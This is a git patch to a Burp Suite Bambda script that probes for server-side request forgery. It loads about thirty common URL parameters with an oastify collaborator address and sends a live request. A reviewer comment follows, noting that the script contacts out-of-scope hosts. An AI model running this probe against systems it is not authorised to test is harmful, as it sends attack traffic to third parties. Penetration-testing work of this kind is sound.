From dd3c4f3d46f74e04f4e0ee7f4e43ba630ec2113f Mon Sep 17 00:00:00 2001
From: Eric Labrador Sainz <74373745+e1abrador@users.noreply.github.com>
Date: Fri, 1 Dec 2023 15:03:51 +0100
Subject: [PATCH] working now -> ssrf_common_params.bambda
---
 Proxy/HTTP/ssrf_common_params.bambda | 69 +++++++++++++---------------
 1 file changed, 33 insertions(+), 36 deletions(-)
diff --git a/Proxy/HTTP/ssrf_common_params.bambda b/Proxy/HTTP/ssrf_common_params.bambda
index 094bca0..6b7f799 100644
--- a/Proxy/HTTP/ssrf_common_params.bambda
+++ b/Proxy/HTTP/ssrf_common_params.bambda
@@ -5,51 +5,48 @@ * * @author Eric Labrador Sainz (https://github.com/e1abrador) */ -public class RequestParameterTester { - public static void main(String[] args) { - String collaboratorUrl = "https://xyz.oastify.com/"; +String collaboratorUrl = "https://xyz.oastify.com/"; - try { - // Replace 'requestResponse.request().url()' with your URL - String originalUrl = "http://example.com"; // Placeholder for the original URL +try { + // Base64 encode the original request URL + String encodedUrl = java.util.Base64.getEncoder().encodeToString(requestResponse.request().url().getBytes()); - // Base64 encode the original URL - String encodedUrl = java.util.Base64.getEncoder().encodeToString(originalUrl.getBytes()); + // Construct the canary URL using the collaborator URL and the encoded original URL + String canary = collaboratorUrl + encodedUrl; - // Construct the canary URL - String canary = collaboratorUrl + encodedUrl; + // Start building the test URL with the original request URL + StringBuilder testURLBuilder = new StringBuilder(requestResponse.request().url()); - // Initialize the StringBuilder with the original URL - StringBuilder testURLBuilder = new StringBuilder(originalUrl); + // Add a '?' or '&' based on whether the original URL already contains query parameters + if (!testURLBuilder.toString().contains("?")) { + testURLBuilder.append("?"); + } else { + testURLBuilder.append("&"); + } - // Determine the initial query parameter delimiter - testURLBuilder.append(originalUrl.contains("?") ? 
"&" : "?"); + // Add the 'base64url' parameter with the canary + testURLBuilder.append("base64url=").append(canary); - // Append the 'base64url' parameter - testURLBuilder.append("base64url=").append(canary); + // Additional parameters to append + String[] paramsToAdd = {"dest", "redirect", "uri", "path", "continue", "url", "window", "next", "data", + "reference", "site", "html", "val", "validate", "domain", "callback", "return", + "page", "feed", "host", "port", "to", "out", "view", "dir", "show", "navigation", + "open"}; - // Parameters to be appended - String[] paramsToAdd = { - "dest", "redirect", "uri", "path", "continue", "url", "window", "next", "data", - "reference", "site", "html", "val", "validate", "domain", "callback", "return", - "page", "feed", "host", "port", "to", "out", "view", "dir", "show", "navigation", - "open" - }; + // Append the additional parameters with the collaboratorUrl as their value + for (String param : paramsToAdd) { + testURLBuilder.append("&").append(param).append("=").append(collaboratorUrl); + } - // Append each parameter with the collaborator URL - for (String param : paramsToAdd) { - testURLBuilder.append("&").append(param).append("=").append(collaboratorUrl); - } + // Convert the StringBuilder to a String and remove the trailing '&' + String testURL = testURLBuilder.toString().replaceAll("&$", ""); - // Convert to String and remove the trailing '&' - String testURL = testURLBuilder.toString().replaceAll("&$", ""); + // Send request + new java.net.URL(testURL).openStream(); - // Send the GET request - new java.net.URL(testURL).openStream(); - - } catch (Exception e) { - System.out.println("Error: " + e.getMessage()); - } - } +} catch (Exception e) { + System.out.println(e.getMessage()); } + +return false;
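Review bot: The script sends a live request from inside a proxy-history filter without checking scope: `new java.net.URL(testURL).openStream()` near the end of the hunk runs for whatever item the filter is evaluated on, so hosts that merely appear in history get contacted. Because the call goes through `java.net.URL` rather than Burp's own HTTP stack, the traffic presumably does not appear in Burp's logs or honour its upstream proxy settings. I would guard the top of the script with `if (!requestResponse.request().isInScope()) { return false; }`. The returned stream is also never closed, which leaks a connection per evaluated row; `try (java.io.InputStream in = new java.net.URL(testURL).openStream()) { }` releases it. The `replaceAll("&$", "")` call is dead code, since no trailing `&` is ever appended.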